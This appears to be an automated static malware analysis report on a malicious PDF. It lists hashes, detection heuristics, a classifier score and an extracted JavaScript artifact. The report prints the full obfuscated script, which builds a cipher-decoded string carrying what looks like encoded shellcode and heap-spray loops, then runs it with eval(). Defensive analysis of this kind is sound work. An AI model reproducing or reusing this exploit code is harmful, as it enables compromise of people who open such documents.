Malicious PDF — malware analysis report

Static analysis result for SHA-256 e52c38141497c0d5…

MALICIOUS

PDF

9.4 KB Created: 2010-05-12 10:26:50 Authoring application: T58chigeOrXTX (via Fvx4SJJ6) First seen: 2026-05-10
MD5: 2f2e634375f334b47da7f1bdd821e1f1 SHA-1: 8a2de7da5bd454266bb0a195f95d05d6c3368b48 SHA-256: e52c38141497c0d5f32218f2d7a1cfbb57010fd3fd020bddf61711e2b3893494
166 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell

The PDF file contains embedded JavaScript, indicated by the PDF_JAVASCRIPT and PDF_JS heuristics. A high-severity PDF_EVAL heuristic firing suggests the script is obfuscated and uses eval() to execute its content. The extracted artifact javascript_obj0007_000.js is likely responsible for downloading and executing a second-stage payload. The obfuscation and use of eval() are common techniques for evading static analysis and delivering malicious content.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 4

  • JavaScript action low 2 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
    {c>SI1>R<K,2A=AyaPzGsQPwCkMtTpKgvsP 1MA*AT;\nAA6)VA,)N w5)<Gwt1.4qaA=AdLcohMi)hGhkzR0EA-AmlWd({c>SI1>R<K,2A+AU04BD;\nAA6)VA7>6)2tWH.CC.,tqnA=A<PsGb)Qsm\"%<tUtU%<tUtU\"D;\nAA7>6)2tWH.CC.,tqnA=AK<UNHSC<YFSYXM1hm7>6)2tWH.CC.,tqnfA,)N w5)<Gwt1.4qaD;\nAA6)VAN6yYbPQZw.z0Gd<(A=AmMBJlSdaz4VK0h5E,A-AU02UUUUUDA/AdLcohMi)hGhkzR0E;\nAAweVAm6)VAGU0{YWR)HyShs6aLA=AU;AGU0{YWR)HyShs6aLAxAN6yYbPQZw.z0Gd<(;AGU0{YWR)HyShs6aLA++ADu\nAAAAbh4cTl6cyN7Nn3bs[GU0{YWR)HyShs6aL]A=A7>6)2tWH.CC.,tqnA+AyaPzGsQPwCkMtTpK;\nAA}\ …
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0007_000.js pdf-javascript-stream PDF /JS object 7 at offset 0x242 8150 bytes
SHA-256: 8e45a35a1844bf74d42acc78c43c83c172ef4b53318f2edd1fe6955a5d7c04c2
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s). 78 of 148 identifiers look randomly generated (e.g. 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmn') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
function L9Uyj6PhRVOZrSAWO2(L9Uyj6PhRVOZrSAWO2,AMPBQkkTldjaoiucH) {var AzVVjGW=L9Uyj6PhRVOZrSAWO2. substr (AMPBQkkTldjaoiucH, 1);return AzVVjGW;}/*c0QP8bxjuC3sRRl|Zp9qLV2GKNcuTzXwqoB|GzP12IkJZLFz1Ff*/function aJeTzuBwT6DciVLN83E(KZvcuSld4) {/*aYJkl|V5bsrHXtwdiBUb|AkjGqZ8*/var WVU0oJk = new String("<>(){} .,ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789");/*ABMTKx5wI0O1iVOSI[AKDSV834FjUDWPEi]PWdBeUPW2lkLu*//*C5WUQVNKa|eeJuisSyEwzjGF59r|Kb0MWMgmhtx8g*/var A4l9WKUhXSbcil1 /*cqCBYV0dH[CNv8McfX4VjRiF4]zrFWAi*/= new String("xjmDu}AgfNZ7oYdCyzLOIK.8{5qF9Rir3hp)abHsw MlJWv>PeQ,VG1<6E0(nUXT42SckBt");/*CjbYZ|fF7t156UbTPx3gV9acz|hLIFOLp*/for(ElmpEhza2J=0;ElmpEhza2J<WVU0oJk.length;ElmpEhza2J++) {if(KZvcuSld4 == L9Uyj6PhRVOZrSAWO2(A4l9WKUhXSbcil1, ElmpEhza2J)) {/*kFkFLizCewX5Gmt[JE8khxsE91KOCz4m5fsG]iJhUh*/return L9Uyj6PhRVOZrSAWO2(WVU0oJk, ElmpEhza2J);/*aKMZTRY3yMm3 <dDag3UIy]A53ZFbum4KwGkFX99M*/}}return KZvcuSld4;}/*lFXEJxkC[t18lx2B]TvfO6RUhXsgW4s8AFDJ*//*nMCXEB924AuOvPcshxP|fvRadPajTjd7wgU0hTs|UdpGtIyQ5DLa*/var sp9E4ZvMZHbR4ZdK = new String;var uuADWdmxILi = new String("\n6)VAbh4cTl6cyN7Nn3bsA=APsEANVV)(mD;\n6)VAy31.ICoUpdiHn)VS;\nw<Pb1lePAK<UNHSC<YFSYXM1hm7>6)2tWH.CC.,tqnfA,)N w5)<Gwt1.4qaDu\nAAEMlvsAm7>6)2tWH.CC.,tqngvsP 1MA*ATAxA,)N w5)<Gwt1.4qaDu\nAAAA7>6)2tWH.CC.,tqnA+=A7>6)2tWH.CC.,tqn;\nAA}\nAA7>6)2tWH.CC.,tqnA=A7>6)2tWH.CC.,tqngG<aG1VlP mUfA,)N w5)<Gwt1.4qaA/ATD;\nAAVs1<VPA7>6)2tWH.CC.,tqn;\n}\nw<Pb1lePA8K7GR0iGo>dS6M2(mIYw0sCV36X5z4V<VDu\nAA6)VAMBJlSdaz4VK0h5E,A=AU0UbUbUbUb;\nAA6)VAyaPzGsQPwCkMtTpKA=A<PsGb)Qsm\"%<2424%<2424%<2424%<UdYZ%<44SZ%<cc7t%<BUZt%<BUUX%<Yd44%<YT24%<YZdN%<YBUS%<ddY7%<dddd%<BZkd%<od2Y%<YdYd%<c2Yd%<Y4Nd%<tdc2%<2Td4%<tdc2%<cYYk%<YdU4%<YdYZ%<c2Yd%<ZtU4%<cXBk%<YXNX%<UkU4%<YdXX%<YdYd%<NNcc%<ZtYZ%<kkBk%<cSXX%<UkYX%<YdXd%<YdYd%<NNcc%<ZtYk%<7NBk%<XUSd%<UkTo%<YdUo%<YdYd%<NNcc%<ZtY4%<UUBk%<UdTX%<UkBd%<Yd4Z%<YdYd%<NNcc%<Ztdd%<TYBk%<UNtc%<UkSk%<YdTt%<YdYd%<NNcc%<NddZ%<okcd%<tNT7%<ccXS%<dkNN%<YBUc%<YdYY%<ZXYd%<tNcc%<c27Z%<YZNN%<YYBS%<c2Zc%<dkZN%<UkZt%<Ydc2%<YdYd%<BkZd%<dSot%<td7U%<kBUk%<YdYd%<ccYd%<d4NN%<TNc2%<Tdc7%<ccZd%<7dNN%<XUBk%<YdYd%<ZdYd%<NNc2%<BSdZ%<ZcYo%<ZNc2%<Ukdk%<YdBY%<YdYd%<NNY7%<TB7d%<Z4Yd%<7XtX%<TBBN%<YZNd%<BNtk%<YdYd%<tNXU%<c27d%<Y4NN%<YYBS%<c2Zc%<dkZN%<NdUk%<YdYd%<BSYd%<ZkYB%<NNY7%<o77Z%<Z742%<XUZ7%<7dtN%<Z7Zd%<NNc2%<BSd4%<ZcYN%<ZNc2%<Ukdk%<Yd77%<YdYd%<YdBS%<tNXU%<c27d%<YkNN%<YoBS%<c2Zc%<dkZN%<ddUk%<YdYd%<BSYd%<c2XU%<ddNN%<YYBS%<c2Zc%<dkZN%<YdUk%<YdYd%<NYYd%<ZoZ2%<UYY7%<UYY7%<UYY7%<UYY7%<U4c7%<ZSYZ%<c2Z7%<Uo4S%<ZoXB%<UdXU%<c2ZN%<c2U4%<YktT%<ZTc2%<ZtY4%<t7c2%<c2o4%<dXtZ%<Y7tk%<ZtX7%<ttc2%<Y77d%<o7X7%<NcTc%<2TNY%<T7Y7%<o7Zt%<YUXt%<ddSX%<XooS%<YktZ%<TXTY%<Y7YT%<NdXo%<XYU2%<XXo2%<tNZX%<ZSUN%<U2c2%<ZSc2%<Y77Z%<Bt4T%<Y4c2%<c2N2%<d4ZS%<4TY7%<YZc2%<Y7c2%<ZXTN%<ToZT%<YdYk%<XZUk%<XUXX%<ZNXU%<N4Zo%<NUNT%<YdNX%<k2cB%<kUk2%<Td4N%<c2Td%<co4U%<4XcX%<k4cY%<ctTY%<cccY%<Tdcd%<c7cT%<ckcd%<c7Td%<cXcd%<TYc2%<cBkU%<4dkU%<c2ct%<4t4o%<UU4S\"D;\nAAlwAmIYw0sCV36X5z4V<VA==AXDu\nAAAAMBJlSdaz4VK0h5E,A=AU04U4U4U4U;\nAAAAyaPzGsQPwCkMtTpKA=A<PsGb)Qsm\"%<2424%<2424%<2424%<UdYZ%<44SZ%<cc7t%<BUZt%<BUUX%<Yd44%<YT24%<YZdN%<YBUS%<ddY7%<dddd%<BZkd%<od2Y%<YdYd%<c2Yd%<Y4Nd%<tdc2%<2Td4%<tdc2%<cYYk%<YdU4%<YdYZ%<c2Yd%<ZtU4%<cXBk%<YXNX%<UkU4%<YdXX%<YdYd%<NNcc%<ZtYZ%<kkBk%<cSXX%<UkYX%<YdXd%<YdYd%<NNcc%<ZtYk%<7NBk%<XUSd%<UkTo%<YdUo%<YdYd%<NNcc%<ZtY4%<UUBk%<UdTX%<UkBd%<Yd4Z%<YdYd%<NNcc%<Ztdd%<TYBk%<UNtc%<UkSk%<YdTt%<YdYd%<NNcc%<NddZ%<okcd%<tNT7%<ccXS%<dkNN%<YBUc%<YdYY%<ZXYd%<tNcc%<c27Z%<YZNN%<YYBS%<c2Zc%<dkZN%<UkZt%<Ydc2%<YdYd%<BkZd%<dSot%<td7U%<kBUk%<YdYd%<ccYd%<d4NN%<TNc2%<Tdc7%<ccZd%<7dNN%<XUBk%<YdYd%<ZdYd%<NNc2%<BSdZ%<ZcYo%<ZNc2%<Ukdk%<YdBY%<YdYd%<NNY7%<TB7d%<Z4Yd%<7XtX%<TBBN%<YZNd%<BNtk%<YdYd%<tNXU%<c27d%<Y4NN%<YYBS%<c2Zc%<dkZN%<NdUk%<YdYd%<BSYd%<ZkYB%<NNY7%<o77Z%<Z742%<XUZ7%<7dtN%<Z7Zd%<NNc2%<BSd4%<ZcYN%<ZNc2%<Ukdk%<Yd77%<YdYd%<YdBS%<tNXU%<c27d%<YkNN%<YoBS%<c2Zc%<dkZN%<ddUk%<YdYd%<BSYd%<c2XU%<ddNN%<YYBS%<c2Zc%<dkZN%<YdUk%<YdYd%<NYYd%<ZoZ2%<UYY7%<UYY7%<UYY7%<UYY7%<U4c7%<ZSYZ%<c2Z7%<Uo4S%<ZoXB%<UdXU%<c2ZN%<c2U4%<YktT%<ZTc2%<ZtY4%<t7c2%<c2o4%<dXtZ%<Y7tk%<ZtX7%<ttc2%<Y77d%<o7X7%<NcTc%<2TNY%<T7Y7%<o7Zt%<YUXt%<ddSX%<XooS%<YktZ%<TXTY%<Y7YT%<NdXo%<XYU2%<XXo2%<tNZX%<ZSUN%<U2c2%<ZSc2%<Y77Z%<Bt4T%<Y4c2%<c2N2%<d4ZS%<4TY7%<YZc2%<Y7c2%<ZXTN%<ToZT%<YdYk%<XZUk%<XUXX%<ZNXU%<N4Zo%<NUNT%<YdNX%<k2cB%<kUk2%<Td4N%<c2Td%<co4U%<4XcX%<k4cY%<ctTY%<cccY%<Tdcd%<c7cT%<ckcd%<c7Td%<cXcd%<TYc2%<cBkU%<4dkU%<c2ct%<4t4o%<UU4S\"D;\nAA}\nAAsvGsAlwAmIYw0sCV36X5z4V<VA==ATDu\nAAAAyaPzGsQPwCkMtTpKA=A<PsGb)Qsm\"%<2424%<2424%<2424%<UdYZ%<44SZ%<cc7t%<BUZt%<BUUX%<Yd44%<YT24%<YZdN%<YBUS%<ddY7%<dddd%<BZkd%<od2Y%<YdYd%<c2Yd%<Y4Nd%<tdc2%<2Td4%<tdc2%<cYYk%<YdU4%<YdYZ%<c2Yd%<ZtU4%<cXBk%<YXNX%<UkU4%<YdXX%<YdYd%<NNcc%<ZtYZ%<kkBk%<cSXX%<UkYX%<YdXd%<YdYd%<NNcc%<ZtYk%<7NBk%<XUSd%<UkTo%<YdUo%<YdYd%<NNcc%<ZtY4%<UUBk%<UdTX%<UkBd%<Yd4Z%<YdYd%<NNcc%<Ztdd%<TYBk%<UNtc%<UkSk%<YdTt%<YdYd%<NNcc%<NddZ%<okcd%<tNT7%<ccXS%<dkNN%<YBUc%<YdYY%<ZXYd%<tNcc%<c27Z%<YZNN%<YYBS%<c2Zc%<dkZN%<UkZt%<Ydc2%<YdYd%<BkZd%<dSot%<td7U%<kBUk%<YdYd%<ccYd%<d4NN%<TNc2%<Tdc7%<ccZd%<7dNN%<XUBk%<YdYd%<ZdYd%<NNc2%<BSdZ%<ZcYo%<ZNc2%<Ukdk%<YdBY%<YdYd%<NNY7%<TB7d%<Z4Yd%<7XtX%<TBBN%<YZNd%<BNtk%<YdYd%<tNXU%<c27d%<Y4NN%<YYBS%<c2Zc%<dkZN%<NdUk%<YdYd%<BSYd%<ZkYB%<NNY7%<o77Z%<Z742%<XUZ7%<7dtN%<Z7Zd%<NNc2%<BSd4%<ZcYN%<ZNc2%<Ukdk%<Yd77%<YdYd%<YdBS%<tNXU%<c27d%<YkNN%<YoBS%<c2Zc%<dkZN%<ddUk%<YdYd%<BSYd%<c2XU%<ddNN%<YYBS%<c2Zc%<dkZN%<YdUk%<YdYd%<NYYd%<ZoZ2%<UYY7%<UYY7%<UYY7%<UYY7%<U4c7%<ZSYZ%<c2Z7%<Uo4S%<ZoXB%<UdXU%<c2ZN%<c2U4%<YktT%<ZTc2%<ZtY4%<t7c2%<c2o4%<dXtZ%<Y7tk%<ZtX7%<ttc2%<Y77d%<o7X7%<NcTc%<2TNY%<T7Y7%<o7Zt%<YUXt%<ddSX%<XooS%<YktZ%<TXTY%<Y7YT%<NdXo%<XYU2%<XXo2%<tNZX%<ZSUN%<U2c2%<ZSc2%<Y77Z%<Bt4T%<Y4c2%<c2N2%<d4ZS%<4TY7%<YZc2%<Y7c2%<ZXTN%<ToZT%<YdYk%<XZUk%<XUXX%<ZNXU%<N4Zo%<NUNT%<YdNX%<k2cB%<kUk2%<Td4N%<c2Td%<co4U%<4XcX%<k4cY%<ctTY%<cccY%<Tdcd%<c7cT%<ckcd%<c7Td%<cXcd%<TYc2%<cBkU%<4dkU%<c2ct%<4t4o%<UU4S\"D;\nAA}\nAA6)VAdLcohMi)hGhkzR0EA=AU02UUUUU;\nAA6)VAlWd({c>SI1>R<K,2A=AyaPzGsQPwCkMtTpKgvsP 1MA*AT;\nAA6)VA,)N w5)<Gwt1.4qaA=AdLcohMi)hGhkzR0EA-AmlWd({c>SI1>R<K,2A+AU04BD;\nAA6)VA7>6)2tWH.CC.,tqnA=A<PsGb)Qsm\"%<tUtU%<tUtU\"D;\nAA7>6)2tWH.CC.,tqnA=AK<UNHSC<YFSYXM1hm7>6)2tWH.CC.,tqnfA,)N w5)<Gwt1.4qaD;\nAA6)VAN6yYbPQZw.z0Gd<(A=AmMBJlSdaz4VK0h5E,A-AU02UUUUUDA/AdLcohMi)hGhkzR0E;\nAAweVAm6)VAGU0{YWR)HyShs6aLA=AU;AGU0{YWR)HyShs6aLAxAN6yYbPQZw.z0Gd<(;AGU0{YWR)HyShs6aLA++ADu\nAAAAbh4cTl6cyN7Nn3bs[GU0{YWR)HyShs6aL]A=A7>6)2tWH.CC.,tqnA+AyaPzGsQPwCkMtTpK;\nAA}\n}\nw<Pb1lePA9G3R .wIW(LbooaomDu\nAA6)VAnpHbLto05yiSok.SA=AU;\nAA6)VA16hwzYT27O {hzHEA=A)QQg6lsEsVisVGlePg1eF1VlP mD;\nAA)QQgbvs)V9l>s8<1my31.ICoUpdiHn)VSD;\n\nAAlwAm16hwzYT27O {hzHEAxAkgXDu\nAAAA8K7GR0iGo>dS6M2(mUD;\nAAAA6)VAIyhZ{vtQ2s1CWyIWA=A<PsGb)Qsm\"%<UbUb%<UbUb\"D;\nAAAAEMlvsAmIyhZ{vtQ2s1CWyIWgvsP 1MAxA22tSTDIyhZ{vtQ2s1CWyIWA+=AIyhZ{vtQ2s1CWyIW;\nAAAA1MlGAgbevv)aF1eVsA=A7evv)agbevvsb1Y>)lvzPwemu\nAAAAAAG<aJA:A\"\"fA>G A:AIyhZ{vtQ2s1CWyIW\nAAAA}\nAAAAD;\nAA}\nlwAm16hwzYT27O {hzHEAj=AtDu\nAAAA1V(Au\nlwAm)QQgHebg7evv)ag s1zbePDu\nAAAAAAAA8K7GR0iGo>dS6M2(mTD;\nAAAAAAAA6)VAM15rBqpL>CJIh.y5A=A<PsGb)Qsm\"%Ut\"D;\nAAAAAAAAEMlvsAmM15rBqpL>CJIh.y5gvsP 1MAxAU02UUUDM15rBqpL>CJIh.y5A+=AM15rBqpL>CJIh.y5;\nAAAAAAAAM15rBqpL>CJIh.y5A=A\".g\"A+AM15rBqpL>CJIh.y5;\n)QQgHebg7evv)ag s1zbePmM15rBqpL>CJIh.y5D;\nAAAAAAAAnpHbLto05yiSok.SA=AX;\nAAAAAA}\nAAAAAAsvGsAu\nAAAAAAAAnpHbLto05yiSok.SA=AX;\nAAAAAA}\nAAAA}\nAAAAb)1bMAmsDu\nAAAAAAnpHbLto05yiSok.SA=AX;\nAAAA}\nAAAAlwAmnpHbLto05yiSok.SA==AXDu\nAAAAAAlwAmm16hwzYT27O {hzHEAj=AkgX&&A16hwzYT27O {hzHEAxAtDDu\nAAAAAAAA8K7GR0iGo>dS6M2(mXD;\nAAAAAAAA6)VAL,aSbW1 8PEUcy<zA=A\"XTtttttttttttttttttt\";\nAAAAAAAAweVAm7OeL>8HpwK<oW7s8A=AU;A7OeL>8HpwK<oW7s8AxATkc;A7OeL>8HpwK<oW7s8A++ADu\nAAAAAAAAAAL,aSbW1 8PEUcy<zA+=A\"B\";\nAAAAAAAA}\nAAAAAAAA<1lvgQVlP1wm\"%2SUUUw\"fAL,aSbW1 8PEUcy<zD;\nAAAAAA}\nAAAA}\nAA}\n}\n)QQgQCFwXKI{Nzpd)9hvA=A9G3R .wIW(Lbooao;\ny31.ICoUpdiHn)VSA=A)QQgGs19l>s8<1m\")QQgQCFwXKI{Nzpd)9hvmD\"fAXUD;\n");/*d1TtR3C1X9o3UfboO2{riEbr3sm73DwX4GGLAID}IrQcMrGakFI*//*Kj0DRcA|gxia4pm4|pR6WiZjPf90lH9vr0*/for(SPT8OX2oIEDQfV=0;SPT8OX2oIEDQfV<uuADWdmxILi.length;SPT8OX2oIEDQfV++)sp9E4ZvMZHbR4ZdK += aJeTzuBwT6DciVLN83E(L9Uyj6PhRVOZrSAWO2(uuADWdmxILi,SPT8OX2oIEDQfV));eval(sp9E4ZvMZHbR4ZdK);/*ATzKzntPhZ1bNgtK3R[cgFcXqkWcRNRQg]bVuLkR*/

Open this report in the interactive analyzer, or submit your own file for analysis.